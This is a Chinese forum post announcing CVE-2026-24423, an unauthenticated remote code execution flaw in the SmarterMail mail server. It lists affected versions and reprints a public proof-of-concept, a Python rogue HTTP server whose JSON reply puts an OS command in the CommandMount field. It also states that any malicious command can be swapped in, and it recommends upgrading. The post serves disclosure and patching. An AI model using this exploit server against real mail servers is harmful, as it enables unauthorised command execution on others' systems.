找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

1863

积分

0

好友

249

主题
发表于 11 小时前 | 查看: 4| 回复: 0

一只背对镜头、翘着尾巴的卡通猫

SmarterMail 是一款由 SmarterTools 公司开发的、基于 Windows 平台的邮件服务器软件。它主要面向中小型企业、教育机构以及需要私有化部署的组织,提供了一套完整的邮件通信解决方案,常被视作 Microsoft Exchange 的轻量级替代品,其优势在于无需依赖 Active Directory。

近期,安全研究人员披露了该软件中的一个高危远程代码执行漏洞,编号为 CVE-2026-24423。该漏洞的根源在于,其内部一个名为 ConnectToHub 的 API 接口在处理请求时,未对访问者的身份进行验证。攻击者可以利用此缺陷,构造特定的网络请求,诱使 SmarterMail 服务器连接至攻击者控制的恶意 HTTP 服务器。随后,恶意服务器可向 SmarterMail 返回包含操作系统命令的响应,从而实现远程命令执行,这无疑给攻击者进行远程渗透测试和利用打开了大门。

鉴于 SmarterMail 在特定用户群体中的使用范围,建议所有相关用户立即进行自查。

漏洞等级

高危

漏洞影响版本

  • SmarterMail 版本号低于 Build 9511 的所有发行版。

漏洞详情与概念验证(PoC)

目前,漏洞的概念验证代码(PoC)已在 GitHub 上公开:
https://github.com/aavamin/CVE-2026-24423

该 PoC 是一个 Python 脚本,模拟了一个恶意的 HTTP 服务器。当存在漏洞的 SmarterMail 服务器向其发送特定请求时,该服务器会返回一个精心构造的 JSON 响应,其中包含可在目标系统上执行的命令。

以下是 PoC 脚本的核心代码:

#!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import json

class Handler(BaseHTTPRequestHandler):
    def _send_json(self, code: int, obj: dict):
        data = json.dumps(obj).encode("utf-8")
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_POST(self):
        if self.path != "/web/api/node-management/setup-initial-connection":
            self._send_json(404, {"error": "not found", "path": self.path})
            return

        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        print("
  • Received POST:", self.path)         print("
  • Body:", body)         resp = {             "ClusterID": "f0e12780-f462-4b51-a7db-149f1d56209c",             "SharedSecret": "any-value",             "TargetHubs": {"a": "b"},             "IsStandby": False,             "SystemMount": {                 "Enabled": True,                 "ReadOnly": False,                 "MountPath": "C:\\",                 "CommandMount": "whoami > C:\\whoami.txt"             },             "SystemAdminUsernames": ["admin"]         }         self._send_json(200, resp) def main():     host = "0.0.0.0"     port = 80     print(f"Serving on http://{host}:{port}")     HTTPServer((host, port), Handler).serve_forever() if __name__ == "__main__":     main() #Powered by ChatGPT
  • 一个戴着头盔和墨镜的调皮笑脸表情

    从代码中可以看到,关键攻击载荷位于 resp 字典的 SystemMount.CommandMount 字段中。示例中命令为 whoami > C:\\whoami.txt,攻击者可以将其替换为任何其他恶意命令。

    修复建议

    厂商已针对此漏洞发布了安全更新。最有效的防护措施是立即将 SmarterMail 升级到最新版本。

    官方下载与更新地址:
    https://www.smartertools.com/smartermail/downloads

    请受影响的用户,特别是负责系统稳定性和安全运维的管理员,务必尽快安排升级工作。同时,在条件允许的情况下,应在升级前对现有系统进行备份,并在测试环境中验证补丁的兼容性。

    对于关注最新安全动态的运维和开发团队,持续学习和信息共享至关重要。欢迎在 云栈社区 与其他技术人员交流此类漏洞的防护经验与最佳实践。




    上一篇:OpenClaw 入门实战:从精准配置到技能组合的进阶指南
    下一篇:硅谷代码与AI Agent如何重构现代战争杀伤链:从硬件对抗到软件定义
    您需要登录后才可以回帖 登录 | 立即注册

    手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

    GMT+8, 2026-3-5 20:27 , Processed in 0.727129 second(s), 42 queries , Gzip On.

    Powered by Discuz! X3.5

    © 2025-2026 云栈社区.

    快速回复 返回顶部 返回列表